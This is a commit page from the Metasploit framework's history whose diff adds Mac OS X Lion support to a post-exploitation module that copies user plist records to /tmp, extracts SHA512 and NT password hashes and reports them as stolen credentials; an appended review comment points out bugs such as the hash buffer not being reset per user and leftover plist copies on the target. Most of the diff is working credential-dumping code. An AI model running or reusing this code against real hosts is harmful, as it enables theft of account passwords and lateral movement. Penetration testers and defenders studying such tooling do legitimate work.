Support for dumping OSX Lion SHA512 Salted hashes, thanks to hammackj for helping in figuring out how to parse the new format

git-svn-id: file:///home/svn/framework3/trunk@13111 4d416f70-5f16-0410-b530-b9f4589650da
Carlos Perez 2011-07-07 03:46:33 +00:00
parent 78f2525fdc
commit b8a232eaf5
1 changed files with 49 additions and 1 deletions


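--- a/<file path not shown on page>
+++ b/<file path not shown on page>
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
 This module dumps SHA1, LM and NT Hashes of Mac OS X Tiger, Leopard and Snow Leopard Systems.
 },
 'License' => MSF_LICENSE,
-'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
+'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>','hammackj <jacob.hammack[at]hammackj.com>'],
 'Version' => '$Revision$',
 'Platform' => [ 'osx' ],
 'SessionTypes' => [ "shell" ]
@@ -151,6 +151,54 @@ class Metasploit3 < Msf::Post
 when /shell/
 guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
 end
+elsif ver_num =~ /10\.(7)/
+require 'rexml/document'
+hash_decoded = ""
+profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
+if profiles
+profiles.each do |p|
+next if p =~ /^_/
+next if p =~ /^daemon|root|nobody/
+cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
+cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
+file = cmd_exec("cat /tmp/#{p.chomp}")
+doc = REXML::Document.new(file)
+hash_text = doc.elements.to_a("///array")[2].elements["data"].text.gsub("\n\t\t","")
+hash_text.unpack('m')[0].each_byte do |b|
+hash_decoded << sprintf("%02X", b)
+end
+user = p.scan(/(\S*)\.plist/)
+sha512 = hash_decoded.slice(104..213)
+nt_hash = hash_decoded.slice(214..249)
+print_status("SHA512:#{user}:#{sha512}")
+file_local_write(sha1_file,"#{user}:#{sha512}")
+report_auth_info(
+:host => host,
+:port => 0,
+:sname => 'sha512',
+:user => user,
+:pass => sha512,
+:active => false
+)
+if nt_hash !~ /000000000000000/
+print_status("NT:#{user}:#{nt_hash}")
+file_local_write(nt_file,"#{user}:#{nt_hash}")
+report_auth_info(
+:host => host,
+:port => 445,
+:sname => 'smb',
+:user => user,
+:pass => nt_hash,
+:active => true
+)
+end
+end
+end
+return
 end
 # Extract the hashes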
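Review bot: `hash_decoded = ""` is created once before `profiles.each`, but `hash_decoded << sprintf("%02X", b)` appends inside the loop, so from the second user onward `slice(104..213)` and `slice(214..249)` keep returning the first user's bytes and every later account is reported with the wrong SHA512/NT hash; the accumulator must be reset per profile, e.g. move the line to `profiles.each do |p|` / `hash_decoded = ""` as the first statement of the block. Relatedly, `user = p.scan(/(\S*)\.plist/)` yields a nested array (`[["name"]]`), which only interpolates as a bare name under Ruby 1.8 `Array#to_s` and is stored as an array in `report_auth_info(:user => user, ...)`; `user = File.basename(p.chomp, '.plist')` gives a plain string on every interpreter. The `cp ... /tmp/` and `plutil -convert xml1` steps also leave a readable copy of each account's shadow hash plist on the target, which the module never removes. The `if ver_num` chain this `elsif` extends begins outside the hunk.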